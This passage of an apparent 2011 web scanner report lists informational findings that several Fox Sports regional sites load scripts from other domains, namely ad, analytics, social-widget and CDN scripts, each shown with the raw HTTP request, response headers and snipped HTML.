Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=e13925e027f6802b91cb1759a97c21c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box~flashobject/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849805?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849805?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.13. http://www.foxsportshouston.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportshouston.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportshouston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxhoust/common/appjs/~1294842442/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.houston/main;tile=3;sz=300x250;ord=1294849857?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxhoust/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.14. http://www.foxsportskansascity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportskansascity.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportskansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 67136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/fsskansa/common/appjs/~1294848598/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.kansascity/main;tile=3;sz=300x250;ord=1294849857?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/fsskansa/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.15. http://www.foxsportsmidwest.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsmidwest.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportsmidwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
28~custom_classes~component_masthead~component_feedtemplate_3box_undercp~component_feedtemplate_310~component_right_generic~component_footer/g=style~flicker/ucdn=1" rel="stylesheet" type="text/css" />
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxmwes/common/appjs/~1294848892/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.midwest/main;tile=3;sz=300x250;ord=1294849817?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxmwes/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.16. http://www.foxsportsohio.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsohio.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportsohio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsohio/common/appjs/~1294849109/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc/menz=1" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://contentserv.brandaffinity.net/engagement/ice/ice.js?PID=00170-dN7hG-11111"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.ohio/main;tile=3;sz=300x250;ord=1294849863?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsohio/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.17. http://www.foxsportssouth.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
</script>-->

<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script>
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/main;tile=3;sz=300x250;ord=1294849869?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.18. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
</script>-->

<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script>
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849839?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849839?" type="text/javascript">
</script>
...[SNIP]...
<div id = "right_newton_239">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.19. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=461568b0214c4c75495615da01f0b1e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 71090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
</script>-->

<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script>
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849869?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849869?" type="text/javascript">
</script>
...[SNIP]...
<div id = "right_newton_239">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.20. http://www.foxsportssouthwest.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxswes/common/appjs/~1294821171/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.southwest/main;tile=3;sz=300x250;ord=1294849812?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxswes/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.21. http://www.foxsportssupports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssupports.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.foxsportssupports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=foxsportssupports"></script>
...[SNIP]...

6.22. http://www.foxsportstennessee.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportstennessee.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportstennessee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 68716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
orizontal_tabs_426~horizontal_tabs_623~custom_classes~component_masthead~component_feedtemplate_310~component_right_generic~component_footer/g=style~flicker/ucdn=1" rel="stylesheet" type="text/css" />
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxtenn/common/appjs/~1294847090/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.tennessee/main;tile=3;sz=300x250;ord=1294849831?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxtenn/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.23. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709 HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=5a10a35d0cd51561897895de30ab37c1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 79224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appjs/~1294822698/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849854?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849854?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.24. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
